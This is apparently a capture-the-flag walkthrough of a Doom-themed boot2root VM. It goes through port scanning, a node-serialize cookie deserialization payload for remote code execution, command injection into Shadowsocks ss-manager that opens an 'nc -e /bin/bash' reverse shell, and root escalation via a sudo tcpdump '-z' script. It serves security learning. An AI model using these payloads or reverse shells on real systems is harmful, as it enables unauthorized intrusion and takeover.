Information gathering
1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.169.36
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.169.64 08:00:27:02:d8:37 PCS Systemtechnik GmbH
192.168.169.131 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.169.249 92:5f:a0:f7:cc:f9 (Unknown: locally administered)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 3 responded
2. nmap
Port scan
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.169.64 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:13 CST
Nmap scan report for 192.168.169.64
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
666/tcp open doom
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.70 seconds
Service and version detection
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 22,666 192.168.169.64 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:17 CST
Nmap scan report for 192.168.169.64
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.169.64
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.79 seconds
We can see that the target has only ports 22 and 666 open.
22:ssh OpenSSH 7.7
666:tcp http Node.js Express framework
Port 666 is serving a Node.js Express application, so there must be a web page on port 666.
Vulnerability scan
┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,666 192.168.169.64 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 18:20 CST
Nmap scan report for 192.168.169.64
Host is up (0.00037s latency).
PORT STATE SERVICE
22/tcp open ssh
666/tcp open doom
MAC Address: 08:00:27:02:D8:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds
The vuln scripts found nothing on the port 666 site!
3. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.169.64:666
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.169.64
+ Target Hostname: 192.168.169.64
+ Target Port: 666
+ Start Time: 2023-12-14 18:22:55 (GMT8)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: Retrieved x-powered-by header: Express.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD .
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8113 requests: 11 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-12-14 18:23:10 (GMT8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4. whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.169.64:666
WhatWeb report for http://192.168.169.64:666
Status : 200 OK
Title : <None>
IP : 192.168.169.64
Country : RESERVED, ZZ
Summary : Cookies[profile], HttpOnly[profile], X-Powered-By[Express]
Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : profile
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : profile
[ X-Powered-By ]
X-Powered-By HTTP header
String : Express (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
X-Powered-By: Express
Set-Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D; Max-Age=900; Path=/; Expires=Thu, 14 Dec 2023 10:37:37 GMT; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 36
ETag: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
Date: Thu, 14 Dec 2023 10:22:37 GMT
Connection: close
The scan turned up an odd-looking cookie; we'll leave it for now and keep going!
Directory enumeration
gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.169.64:666 --wordlist=/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.169.64:666
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
Directory brute-forcing found nothing, so let's dig deeper!
WEB
Port 666
Visiting the page on port 666 shows nothing, and the page source is empty as well! Let's capture a request and take a look!
Burp Suite
The cookie looks Base64-encoded; let's decode it:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D
The cookie contains a username and some token information.
The trailing %3D URL-decodes to an equals sign!
When we refresh the page, the server responds with an error trace:
SyntaxError: Unexpected token F in JSON at position 79
at JSON.parse (<anonymous>)
at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
at /home/nodeadmin/.web/server.js:12:29
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at /home/nodeadmin/.web/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:335:12)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:275:10)
It seems a double quote is missing; we add it, Base64-encode the result again, and resend!
Sure enough, it was the quote. Remember to drop the trailing %3D, and then we get a response! After some testing, the page appears to simply echo back the user information from the cookie. Let's keep testing!
I removed the extra fields at the end and kept only the username key and its value, encoded it and sent it, and the response was exactly the same as before! So it works fine without the token?
Testing shows the username can be changed to anything and is always echoed back! If that is the case, there is our vulnerability!
We conclude that this is a JSON deserialization vulnerability (the stack trace above shows node-serialize's unserialize() being called on the cookie)! The username parameter is under our control, so we only need to put a reverse shell in the username field.
JSON deserialization
payload
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(e,out,err)=>{console.log(out);}); }()"}
The 'whoami' argument to execSync is controllable, so it can be replaced with a reverse shell.
This JSON payload contains JavaScript function code.
The function abuses how node-serialize handles the _$$ND_FUNC$$_ marker: on deserialization the string is turned back into a function, and the trailing () invokes it immediately, so the server runs whoami through child_process and prints the result. Whoever controls the cookie can execute arbitrary commands on the system!
Reverse shell
Use Python to get an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
System enumeration
[nodeadmin@localhost home]$ uname -a
uname -a
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[nodeadmin@localhost home]$ lsb_release -a
lsb_release -a
bash: lsb_release: command not found
[nodeadmin@localhost home]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
geoclue:x:997:993:User for geoclue:/var/lib/geoclue:/sbin/nologin
colord:x:996:992:User for colord:/var/lib/colord:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gluster:x:995:989:GlusterFS daemons:/run/gluster:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
chrony:x:994:988::/var/lib/chrony:/sbin/nologin
dnsmasq:x:987:987:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
openvpn:x:986:986:OpenVPN:/etc/openvpn:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
saslauth:x:985:76:Saslauthd user:/run/saslauthd:/sbin/nologin
nm-openvpn:x:984:983:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
nm-openconnect:x:983:982:NetworkManager user for OpenConnect:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
pipewire:x:982:980:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:981:979::/run/gnome-initial-setup/:/sbin/nologin
vboxadd:x:980:1::/var/run/vboxadd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nginx:x:979:977:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:976:Webalizer:/var/www/usage:/sbin/nologin
nodeadmin:x:1001:1001::/home/nodeadmin:/bin/bash
fireman:x:1002:1002::/home/fireman:/bin/bash
[nodeadmin@localhost home]$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
[nodeadmin@localhost home]$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
[nodeadmin@localhost home]$ sudo -l
sudo -l
[sudo] password for nodeadmin: 1
Sorry, try again.
[sudo] password for nodeadmin: 2
Sorry, try again.
[sudo] password for nodeadmin: 3
sudo: 3 incorrect password attempts
[nodeadmin@localhost home]$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/userhelper
/usr/sbin/pam_timestamp_check
/usr/sbin/mtr-packet
/usr/sbin/usernetctl
/usr/sbin/exim
/usr/sbin/mount.nfs
/usr/sbin/unix_chkpwd
/usr/libexec/gstreamer-1.0/gst-ptp-helper
/usr/libexec/Xorg.wrap
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/bin/newgidmap
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/mount
/usr/bin/at
/usr/bin/su
/usr/bin/umount
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chage
/usr/bin/newgrp
/usr/local/lib/authbind/helper
/usr/lib/polkit-1/polkit-agent-helper-1
[nodeadmin@localhost home]$ ps aux | grep "fireman"
ps aux | grep "fireman"
root 826 0.0 0.1 301464 4576 ? S 05:12 0:00 su fireman -c /usr/local/bin/ss-manager
fireman 833 0.0 0.0 37060 3904 ? Ss 05:12 0:00 /usr/local/bin/ss-manager
nodeadm+ 1147 0.0 0.0 213788 1056 pts/0 S+ 06:45 0:00 grep --color=auto fireman
After going through all that information nothing looked exploitable, but when we finally checked the process list, it turned out there was something hidden in there!
Local privilege escalation
We find a process running as the fireman user: ss-manager, where "ss" stands for Shadowsocks!
Shadowsocks-libev is a lightweight, secure SOCKS5 proxy for embedded and low-end devices.
ss-manager is designed to control Shadowsocks servers for multiple users, so it spawns new server instances on demand.
So we'll interact with the Shadowsocks manager service using netcat.
[nodeadmin@localhost home]$ netstat -anop
netstat -anop
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 108 192.168.169.64:33790 192.168.169.36:1234 ESTABLISHED 1046/nc on (0.20/0/0)
tcp6 0 0 :::22 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 :::666 :::* LISTEN - off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* - off (0.00/0/0)
udp 0 0 127.0.0.1:323 0.0.0.0:* - off (0.00/0/0)
udp 0 0 127.0.0.1:8839 0.0.0.0:* - off (0.00/0/0)
udp 23936 0 0.0.0.0:5353 0.0.0.0:* - off (0.00/0/0)
nodeadmin user
payload
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
This command sends UDP datagrams to port 8839 on localhost (127.0.0.1), where ss-manager is listening (see the netstat output above).
We then send a JSON message containing the configuration for a new proxy server instance; server_port 8003 is the proxy port.
A shell command is injected into the "method" field, which starts a shell connected back to the given IP (192.168.169.36) and port (4444).
Reference: Command Execution in ss-manager, Issue #1734, shadowsocks/shadowsocks-libev on GitHub. Severity Rating: High; Confirmed Affected Versions: 3.1.0; Confirmed Patched Versions: after commit c67d275; Vendor: Shadowsocks; Vendor URL: https://github.com/shadowsocks/shadowsocks-libev; Vector: Local; Credit: X41 D-Sec GmbH, Nik... https://github.com/shadowsocks/shadowsocks-libev/issues/1734
[nodeadmin@localhost home]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.169.36 4444 -e /bin/bash ||"}
okok
fireman user
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 46430
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
We have successfully become the fireman user. Now let's try local privilege escalation!
fireman can run tcpdump via sudo, and tcpdump can also be used to execute code.
payload
cd /tmp
echo "nc -e /bin/bash 192.168.169.36 5656" > exp
chmod +x exp
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
Don't forget to start a local listener first.
root user
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 46440
python3 -c 'import pty;pty.spawn("/bin/bash")'
[fireman@localhost root]$ cd /tmp
cd /tmp
[fireman@localhost tmp]$ echo " nc -e /bin/bash 192.168.169.36 5656" > exp
echo " nc -e /bin/bash 192.168.169.36 5656" > exp
[fireman@localhost tmp]$ ls
ls
exp
systemd-private-23d4899d3e104ec9bf20e49609c31f4e-chronyd.service-HMP6AO
systemd-private-23d4899d3e104ec9bf20e49609c31f4e-rtkit-daemon.service-Qg7q6I
tmp.DsCsuxOpqW
[fireman@localhost tmp]$ chmod +x exp
chmod +x exp
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
< -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
22 packets received by filter
0 packets dropped by kernel
[fireman@localhost tmp]$
get flag
┌──(root㉿ru)-[~/kali]
└─# nc -lvp 5656
listening on [any] 5656 ...
192.168.169.64: inverse host lookup failed: Unknown host
connect to [192.168.169.36] from (UNKNOWN) [192.168.169.64] 40660
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -al
total 84
dr-xr-x---. 10 root root 4096 Jun 7 2018 .
dr-xr-xr-x. 18 root root 4096 May 30 2018 ..
-rw------- 1 root root 130 Jun 7 2018 .bash_history
-rw-r--r--. 1 root root 18 Feb 9 2018 .bash_logout
-rw-r--r--. 1 root root 176 Feb 9 2018 .bash_profile
-rw-r--r--. 1 root root 176 Feb 9 2018 .bashrc
drwx------. 3 root root 4096 Jun 1 2018 .cache
drwxrwx---. 4 root root 4096 May 30 2018 .config
-rw-r--r--. 1 root root 100 Feb 9 2018 .cshrc
drwx------. 3 root root 4096 May 30 2018 .dbus
-rw-------. 1 root root 16 May 30 2018 .esd_auth
-rw-r--r-- 1 root root 1993 Jun 7 2018 flag.txt
-rw-r--r-- 1 root root 12288 Jun 3 2018 .flag.txt.swp
drwxr-xr-x 4 root root 4096 Jun 3 2018 .forever
-rw------- 1 root root 1389 Jun 2 2018 .mysql_history
drwxr-xr-x. 5 1000 1000 4096 May 30 2018 .npm
drwxr-----. 3 root root 4096 May 30 2018 .pki
drwxr-xr-x 2 root root 4096 Jun 1 2018 .shadowsocks
drwx------ 2 root root 4096 Jun 7 2018 .ssh
-rw-------. 1 root root 0 May 30 2018 .Xauthority
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+-----------------------------------------------------------------------------+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| -- | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|--__ | -- |\________________________________/~~\~~| / \ / \ |
| |~~--__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~--_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|----| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_--~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __--P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+-----------------------------------------------------------------------------+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| .... ......... |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| .... ......... |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| .... ......... |
+-----------------------------------------------------------------------------+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther
Summary
First, we performed network scanning and port enumeration with arp-scan and Nmap to gather basic information about the target host, then ran web scanning and directory enumeration with Nikto and WhatWeb, which found no problems.
Next, we captured and decoded the HTTP request with Burp Suite and found a JSON deserialization vulnerability; analysing it showed that a particular parameter could be used to execute arbitrary commands.
Finally, we used Python to get an interactive shell and successfully escalated privileges on the target host. The whole process covered information gathering, vulnerability discovery and exploitation.